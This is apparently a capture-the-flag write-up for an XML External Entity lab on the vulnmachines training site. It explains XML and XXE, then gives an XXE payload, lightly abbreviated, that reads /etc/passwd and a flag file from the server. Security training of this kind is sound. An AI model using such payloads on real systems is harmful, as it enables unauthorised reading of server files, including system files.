XML External Enitity writeup vulnmachines

What is XML eXternal Entity (XXE)?

XML External Entity is a vulnerability that is found in web applications, where the XML parser insecurely parses XML data. If the XML file refers to an external entity to display or process data, an attacker can construct a malicious request in an input parameter or create a malicious request, and cause command execution, DOS attack, unrestricted file read and various other attacks on the application

What is XML?

XML is an eXtensible Markup Language designed to transfer and store data. The structure is a tree structure with tags. This is like HTML, however, the difference between XML and HTML is as follows:

XML is designed to transfer and store data.

HTML is designed to display data.

XML Structure

Look at the below simple XML file structure, the first line is the XML declaration, the second row <vulnmachines> is the root element, the following ‘to’, ‘from’, ‘heading’ and ‘body’ tags are child elements, which constitute the entire self-descriptive structure：

<?xml version=”1.0" encoding=”UTF-8"?>

<vulnmachines>

<to>Vulnmachines</to>

<from>TheSecOpsGroup</from>

<heading> XXE Vulnerability</heading>

<body>Follow us on Twitter @vulnmachines</body>

</vulnmachines>

Question :

Capture the flag by leveraging the XXE vulnerability.

Solution:

Step 1: Visit vulnmachines.com

Step 2: Go to Mission -> Game -> Mission. Select ‘XML External Entity’.

Step 3: Click on ‘Lab Access’.

https://www.vulnmachines.com

Step 4: You will be redirected to the below page.

Step 5: The vulnerable parameter here is the Message parameter. Now here a special XML header has been crafted. Use that and send it to the server to read local files from the server.

Payload :

<!DOCTYPE item [ <!ELEMENT item ANY >

<!ENTITY xxe S “payload” >]>

<items><item name=”item1">a</item>

<item name=”item2">&xxe;</item>

<item name=”item3">c</item>

<item name=”item4">d</item>

</items>

Note : S denotes system and “payload” denotes file:///etc/passwd

Now revisit the hint. Hint — Access ‘Home/app’ and read the flag file.

Flag: Read flag file at home/app/f149.txt

<!DOCTYPE item [ <!ELEMENT item ANY >

<!ENTITY xxe S “payload” >]>

<items><item name=”item1">a</item>

<item name=”item2">&xxe;</item>

<item name=”item3">c</item>

<item name=”item4">d</item>

</items>

Note : S denotes system and “payload” denotes file:///home/app/f149.txt

References:

https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

https://github.com/payloadbox/xxe-injection-payload-list